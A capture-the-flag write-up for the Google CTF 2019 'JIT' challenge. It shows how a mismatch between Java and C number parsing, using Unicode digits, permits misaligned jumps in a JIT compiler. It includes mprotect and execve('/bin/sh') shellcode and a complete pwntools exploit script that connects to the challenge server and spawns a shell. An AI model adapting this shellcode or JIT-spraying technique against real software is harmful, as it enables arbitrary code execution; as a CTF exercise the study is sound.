Google CTF 2019 – JIT

Thanks to Rektinator and TwistedFate for helping me solve this challenge.

JIT was one of Google’s pwnable challenges. It implements an artificial assembly language, which gets jit-compiled into x64 assembly.

An example program looks like this:

MOV(A, 10)
STR(A, 1)
LDR(A, 2)
SUM()
JMP(2)
RET()

It supports basic instructions to move, add and subtract, jump and compare values.

Two files were given: compiler.c and FancyJIT.java

The c file implements the jit-compilation by translating each indiviual instruction into the corresponding x64 assembly instruction and storing everything in an executable buffer. The c file itself lacks many security checks which would potentially enable a whole bunch of attack vectors.

However, the java file is the entry point of the challenge. It takes the given instructions and verifies that no dangerous input was sent and passes valid programs to the c file to execute the instructions.

Approach

Each compiled instruction is padded to 5 bytes.

So the initial idea was to exploit the JMP operation to perform misaligned jumps outside the 5 byte alignment to reinterpret the given instructions, so that malicous operations can be executed. The operand of the jump instruction is read in the following way:

out[4] = (intbracket(cmd + 4) - instrno) * 5 - 5; // jmp imm8

So the target was to pass a large number that, when it gets truncated to an 8-bit value to fit in the operand, causes a misaligned jump.

However, the java parser has a check that makes sure this does not happen:

if (instr.arg < 0 || instr.arg >= program.length || Math.abs(i - instr.arg) > 20) {

Is there a way to bypass this java check? The first thing to look at, is how numbers are parsed.

In c, the function called intbracket is used:

int intbracket(const char* s) {
  int mul = 1;
  if (*s == '-' || *s == '+') {
	  mul = (*s == '-') ? -1 : 1;
	  s++;
  }
  int res = 0;
  for (; *s != ')'; s++) {
    res = res * 10 + *s - '0';
  }
  return res * mul;
}

It just takes the ascii value of each character and subtracts the value of 0 in ascii. However, there is no check that verifies that the characters are within the range of 0-9. Any other character, for example the letter A would be a valid input and converted to a number.

On the java side, the function Integer.parseInt is used. Passing any kind of invalid input results in a NumberFormatException which cancels the program. So it’s not possible to pass letters to exploit the incorrect c behaviour.

However, strings in java have unicode support, in c they don’t. That means if there are any kind of special numbers that java accepts, c would still treat them in a different way.

To test that, a small script was used that generates all kinds of unicode characters to check if Integer.parseInt accepts them. And indeed, there is a whole bunch of characters that represent the digits 0-9 in different languages. For example is the digit 5and gets converted by java. A list of many of the characters can be found in the code below.

Using these special characters, the difference of the parsers can be abused to construct numbers that cause misaligned jumps.

The MOV instruction of the artifical assembly language can now be abused to encode operations in the immediate operand.

This works, but has limitations:

 if (instr.arg < 0 || instr.arg > 99999)

The java parser ensures that any immediate operand is positive and below 99999. The consequence is that we can only insert operations that require 2 bytes or less. Additionally, as the operand is 32 bit wide, our number is filled up with 00 00 which encodes the instruction add byte ptr [rax], al. That means if we execute our own instruction, the value of al will always be added to the byte that rax points to. That means if we want to maintain execution and prevent crashes, rax must point to writable memory (as you guessed it, by default it does not).

One way to bypass that would be to execute the instruction xchg rax, r12 which swaps the value of r12 and rax. As r12 points to a data segment that can be used to store and load values using the artificial assembly language, it must be a pointer to writable memory.

That way, we could at least keep the program running. However, we’re still limited to two byte instructions.

So the idea to bypass this limitation is to abuse the magic characters that were used construct the misaligned jump, to create an immediate operand on c side which contains our target operation of up to 4 bytes.

To do that, we would need to be able to have an algorithm that transforms one or more assembly instructions to a sequence of magic numbers that represent those instructions.

The way the intbracket function converts numbers makes this extremely hard (if not impossible).

It takes a given input digit, tries to map it to a digit within the range 0-9 and then shifts the existing result to the left by multiplying it by 10. So it essentially does a conversion to base 10. Using those magic numbers however, we insert digits that are outside the range of base 10, but in base256. That means changing a single digit, then converting the number to base 10 and back to base 16 (to look at the bytes), causes an effect on more than one digit to the result number.

There might be ways to reverse this calculation, but for me this looked like a simple form of a one-way hash function. You can find the value in one direction, but not the other way round.

As everyone knows, if you want to reverse a hash algorithm, you have to brute force the value. So we can generate a sequence of magic characters, check if the converted number corresponds to the instructions we want to execute and if not, a new sequence is generated until we get a satisfying result.

Brute forcing 4 byte instructions can take very long, but up to 3 bytes is fine. However, that means our magic sequence will still result in one byte that encodes another possible instruction. So these remaining bytes need to encode instructions that are valid and don’t interfere with our shellcode we’re trying to execute.

Using that, the idea is now to somehow call the execve syscall to spawn a shell. For that however, we need to store the string /bin/sh somewhere in memory. Although I later figured out there are ways to do that, I did not manage to do that.

So I chose another approach. Because what makes brute forcing the instructions so hard, is that all desired bytes and bits have to match. If only parts of the bits would have to match, it would be way easier to encode long instructions.

And this can actually be achieved, as there is support for an ADD instruction. That means we can generate a magic sequence that results in a number that is significantly close to our target number that represents the instructions we want execute and then we can use the ADD operation to actually add the remaining value using usual base 10 numbers.

However, that means that the value is then stored in a register and not in memory. To be able to execute it, it needs to be written to memory. For that, the STR operation of the artificial assembly can be used to write the value to the data storage. The only problem is that this memory segment is not executable. We can not execute the instructions we placed there (neither could we swap out the data and text segment to store our instructions in the executable text segment, as it is not writable).

So what needs to be done, is to mark the data page as writable and executable. This can be achieved using the mprotect syscall. Calling this one is easily possible. Using the brute force mechanism, the following shellcode needs to be translated into magic sequences:

; zero out rbx
; mov r12 -> rdi (data pointer)
push r12
xor rax, rax
pop rdi
xchg rax, rbx

; set rsi to 4096 (page size)
push rbx
mov bx, 0x1000
push rbx
pop rsi
pop rbx

; set rdx to 7 (execute + read + write)
push rbx
mov bx, 7
push rbx
pop rdx; pop rbx

; set rax to 10 (mprotect syscall id)
push r12
xor rax, rax
pop rdi

; execute syscall
syscall

There might be instructions in there that seem redundant, but they are needed as the brute forced magic sequence either contains them or contains other instructions that cause an issue that needs to be fixed up.

Using this, we can now use the second and easier method by generating an approximate representation of our operation and finally adding the ramainder using the add operation and storing it in the data segment.

Using this, we simply have to encode the shellcode to spawn the shell:

; clear rdx and rax
xor rdx, rdx
xor rax, rax

; write "/bin/sh" to rbx
mov bx, 0x68
shl rbx, 0x10
mov bx, 0x732F
shl rbx, 0x10
mov bx, 0x7E69
mov cx, 0x1000
sub bx, cx
shl rbx, 0x10
mov bx, 0x622F
push rbx

; construct the commandline array
mov rdi, rsp
push rax; push rdi
mov rsi, rsp

; set rax to 59 (execve syscall id)
mov al, 0x3b

; execute syscall
syscall

Here again, some instructions might seem unnecessary or overly complicated. But splitting up operations or adding unnecessary instructions was either necessary due to the 4 byte instruction limit or the difficulty of brute forcing them.

Finally, we simply need to execute the shellcode by pushing r12 on the stack and returning. This causes the data segment to be executed and results in our shell and the desired flag:

CTF{8röther_m4y_1_h4v3_söm3_nümb3r5}

Code

The code requires the compiled libcompiler.so, as it loads the intbracket function to convert the numbers!

#!/usr/local/bin/python
# -*- coding: utf-8 -*-

from pwn import *
from ctypes import cdll
context(arch = 'amd64', os = 'linux')

magicNumbers = ["०", "१", "२", "३", "४", "५", "६", "७", "८", "९", "০", "১", "২", "৩", "৪", "৫", "৬", "৭", "৮", "৯", "੦", "੧", "੨", "੩", "੪", "੫", "੬", "੭", "੮", "੯", "૦", "૧", "૨", "૩", "૪", "૫", "૬", "૭", "૮", "૯", "୦", "୧", "୨", "୩", "୪", "୫", "୬", "୭", "୮", "୯", "௦", "௧", "௨", "௩", "௪", "௫", "௬", "௭", "௮", "௯", "౦", "౧", "౨", "౩", "౪", "౫", "౬", "౭", "౮", "౯", "೦", "೧", "೨", "೩", "೪", "೫", "೬", "೭", "೮", "೯", "൦", "൧", "൨", "൩", "൪", "൫", "൬", "൭", "൮", "൯", "෦", "෧", "෨", "෩", "෪", "෫", "෬", "෭", "෮", "෯", "๐", "๑", "๒", "๓", "๔", "๕", "๖", "๗", "๘", "๙", "໐", "໑", "໒", "໓", "໔", "໕", "໖", "໗", "໘", "໙", "༠", "༡", "༢", "༣", "༤", "༥", "༦", "༧", "༨", "༩"]

class PayloadBuilder:
    def __init__(self, _r, _firstJump): 
        self.instruction = 0
        self.r = _r
        self.jump = _firstJump
        self.maxJump = 0
        self.dataOffset = 0
        self.libcompiler = cdll.LoadLibrary('./libcompiler.so')

    def _convertStringToInt(self, _str):
        return self.libcompiler.intbracket(_str + ")")

    def _createString(self, i):
        res = ""
        resInt = ""
        _len = len(magicNumbers)

        while True:
            index = i % _len
            res += magicNumbers[index]
            resInt += str(index % 10)
            i = int(i / _len)

            if i == 0:
                break
        return [res, resInt]

    def _makeByte(self, byte):
        if byte > 127:
            return (256-byte) * (-1)
        else:
            return byte

    def _getJump(self, _number, _offset):
        return self._makeByte(((_number - _offset) * 5 - 5) &amp; 0xFF)

    def _findJump(self, _length, _offset):
        _len = len(magicNumbers)
        for i in range(0, _len ** 3):
            s = self._createString(i)

            if abs(self.instruction - int(s[1])) > 20:
                continue

            _num = self._convertStringToInt(s[0])
            _num = self._getJump(_num, _offset)

            if _num == _length:
                return [s[0], int(s[1])]

        raise Exception("No working number found!")

    def _findNextJump(self, _length, _offset):
        for i in range(_offset, 800):
            try:
                s = self._findJump(_length, i)
                return [i, s]
            except:
                pass

        raise Exception("No working number found for length(" + str(_length) + ") and offset(" + str(_offset) + ")!")

    def _assembleAsInt(self, _str, _limit):
        res = asm(_str)
        if(len(res) > _limit):
            raise Exception("Instruction too long: " + str(len(res)))

        _len = len(res)

        for i in range(0, 4 - len(res)):
            res += "\x00"

        return [u32(res, sign="signed"), _len]

    def _assembleAsString(self, _str, _limit):
        return str(self._assembleAsInt(_str, _limit)[0])

    def sendLine(self, _line):
        self.r.sendline(_line)
        self.instruction += 1

    def insertUnalignedJump(self, _length):
        nextJump = self._findNextJump(_length, self.instruction)

        jumpPos = nextJump[1][1]

        if jumpPos > self.maxJump:
            self.maxJump = jumpPos

        while self.instruction < nextJump[0]:
            self.sendLine("CMP(A, 0)")

        self.sendLine("JMP(" + nextJump[1][0] + ")")

    def executeValue(self, _string):
        self.insertUnalignedJump(1)
        self.sendLine("MOV(B, " + _string + ")")

    def executeInstruction(self, _string):
        self.insertUnalignedJump(1)
        self.sendLine("MOV(B, " + self._assembleAsString(_string, 2) + ")")

    def writeNextData(self, _string, _difference):
        self.sendLine('MOV(A, ' + _string + ')')
        self.sendLine('ADD(A, ' + str(_difference) + ')')
        self.sendLine('STR(A, ' + str(self.dataOffset) + ')')
        self.dataOffset += 1

    def finish(self):
        while self.instruction <= self.maxJump:
            self.sendLine("RET()")

        self.sendLine("")
        self.r.interactive()


r = remote('jit.ctfcompetition.com', 1337)
builder = PayloadBuilder(r, 1)

##############################
# Step 1: make data executable

# zero out rbx
# mov r12 -> rdi (data pointer)
builder.executeValue("౬૦෬൯") # push r12
builder.executeValue("෯०൫๖") # xor rax, rax; pop rdi
builder.executeValue("༡൨௩௪") # xchg rax, rbx

# set rsi to 4096 (page size)
builder.executeValue("෭८৬෭") # push rbx
builder.sendLine("MOV(B, 4096)")
builder.executeValue("෭८৬෭") # push rbx
builder.executeValue("૧໙໖෨") # pop rsi; pop rbx

# set rdx to 7 (execute + read + write)
builder.executeValue("෭८৬෭") # push rbx
builder.sendLine("MOV(B, 7)")
builder.executeValue("෭८৬෭") # push rbx
builder.executeValue("෪෯੭౨") # pop rdx; pop rbx

# set rax to 10 (mprotect syscall id)
builder.executeValue("౬૦෬൯") # push r12
builder.executeValue("෯०൫๖") # xor rax, rax; pop rdi
builder.sendLine("MOV(A, 10)")

# execute syscall
builder.executeValue("๘೭੪௩") # syscall


#########################################
# Step 2: write shellcode to data segment

# clear rdx and rax
builder.writeNextData("੭੯༦೪", 90112) # xor rdx, rdx
builder.writeNextData("෯०൫๖", 0) # xor rax, rax

# write "/bin/sh" to rbx
builder.sendLine("MOV(B, 104)") # mov bx, 0x68 -> immediate execution
builder.writeNextData("൬໔༢๕", 33081) # shl rbx, 0x10
builder.writeNextData("૯૭૫୬", 92768) # mov bx, 0x732F
builder.writeNextData("൬໔༢๕", 33081) # shl rbx, 0x10
builder.writeNextData("༤൯༡೨", 73128) # mov bx, 0x7E69
builder.writeNextData("૩௮൫౪", 346) # mov cx, 0x1000
builder.writeNextData("௪੧੨໑", 20039) # sub bx, cx
builder.writeNextData("൬໔༢๕", 33081) # shl rbx, 0x10
builder.writeNextData("෯੧০౧", 9349) # mov bx, 0x622F
builder.writeNextData("෭८৬෭", 0) # push rbx

# construct the commandline array
builder.writeNextData("౭೫౪౭", 24097) # mov rdi, rsp
builder.writeNextData("२൦൯༣", 15421) # push rax; push rdi
builder.writeNextData("෭༠༡୭", 68097) # mov rsi, rsp

# set rax to 59 (execve syscall id)
builder.writeNextData("೧໓೯૮", 9500) # mov al, 0x3b

# execute syscall
builder.writeNextData("๘೭੪௩", 0) # syscall

#####################
# Step 3: spawn shell

builder.executeValue("౬૦෬൯") # push r12
builder.sendLine("RET()")
builder.finish()

The code to brute force the instructions can be found here, but is not needed for the exploit to work (and it’s way less documented as it was just quick and dirty prototyping):

#!/usr/local/bin/python
# -*- coding: utf-8 -*-

from pwn import *
from ctypes import cdll
import random
context(arch = 'amd64', os = 'linux')

goodCharacters = ["०", "१", "२", "३", "४", "५", "६", "७", "८", "९", "০", "১", "২", "৩", "৪", "৫", "৬", "৭", "৮", "৯", "੦", "੧", "੨", "੩", "੪", "੫", "੬", "੭", "੮", "੯", "૦", "૧", "૨", "૩", "૪", "૫", "૬", "૭", "૮", "૯", "୦", "୧", "୨", "୩", "୪", "୫", "୬", "୭", "୮", "୯", "௦", "௧", "௨", "௩", "௪", "௫", "௬", "௭", "௮", "௯", "౦", "౧", "౨", "౩", "౪", "౫", "౬", "౭", "౮", "౯", "೦", "೧", "೨", "೩", "೪", "೫", "೬", "೭", "೮", "೯", "൦", "൧", "൨", "൩", "൪", "൫", "൬", "൭", "൮", "൯", "෦", "෧", "෨", "෩", "෪", "෫", "෬", "෭", "෮", "෯", "๐", "๑", "๒", "๓", "๔", "๕", "๖", "๗", "๘", "๙", "໐", "໑", "໒", "໓", "໔", "໕", "໖", "໗", "໘", "໙", "༠", "༡", "༢", "༣", "༤", "༥", "༦", "༧", "༨", "༩"]

libcompiler = cdll.LoadLibrary('./libcompiler.so')

def doByte(byte):
    if byte > 127:
        return (256-byte) * (-1)
    else:
        return byte

def parseNum(_str):
    return libcompiler.intbracket(_str + ")")

def getJump(_num, offs):
    return doByte(((_num - offs) * 5 - 5) &amp; 0xFF)

def getStore(_num):
    return doByte((4 * _num) &amp; 0xFF)

def createString(i):
    res =""
    _len = len(goodCharacters)

    while True:
        index = i % _len
        res += goodCharacters[index]
        i = int(i / _len)

        if i == 0:
            break
    return res

def asmToInt(_str):
    res = asm(_str)
    if(len(res) > 4):
        raise Exception("Instruction too long: " + str(len(res)))
        #print("Instruction too long: " + str(len(res)))

    _len = len(res)

    for i in range(0, 4 - len(res)):
        res += "\x00"

    return [u32(res, sign="signed"), _len]

def asmToIntStr(_str):
    return str(asmToInt(_str)[0])

masks = [
    0,
    0xFF,
    0xFFFF,
    0xFFFFFF,
    0xFFFFFFFF
]

def partialDisassembler(_str, _lim):
    _num = parseNum(_str)
    _real_lim = _lim[1]

    _masked_num = _num &amp; masks[_real_lim]
    _diff = _lim[0] - _masked_num

    if _diff < 0 or _diff > 99999:
        return

    if(_real_lim == 4):
        print(_str + ": " + str(_diff))
        raw_input("\n")
    else:
        _str2 = p32(_num, sign="signed")
        _res = disasm(_str2[_real_lim:])
        print(_str + ": " + str(_diff) + "\n" + _res)
        raw_input("\n")


def fullDisassembler(_str, _lim):
    _num = parseNum(_str)

    _real_lim = _lim[1]

    #print(hex(masks[_real_lim]))
    #raw_input("\n")

    if (_num &amp; masks[_real_lim]) != _lim[0]:
        return

    print(str(_num))
    _str2 = p32(_num, sign="signed")
    _res = disasm(_str2[:])
    print(_str + ":\n" + _res)
    #raw_input("\n")

def generateFullInstruction(_asm):
    _asmnum = asmToInt(_asm)

    print("Brute forcing for length: " + str(_asmnum[1]))
    while True:
        _str = ""
        for j in range(0, 4):
            _str += goodCharacters[random.randrange(len(goodCharacters))]

        fullDisassembler(_str, _asmnum)


def generatePartialInstructionWithRemainder(_asm):
    _asmnum = asmToInt(_asm)

    while True:
        _str = ""
        for j in range(0, 4):
            _str += goodCharacters[random.randrange(len(goodCharacters))]

        partialDisassembler(_str, _asmnum)
	

############################
# generate instructions here
	
generateFullInstruction("xor rax, rax")
#generatePartialInstructionWithRemainder("syscall")
# [...]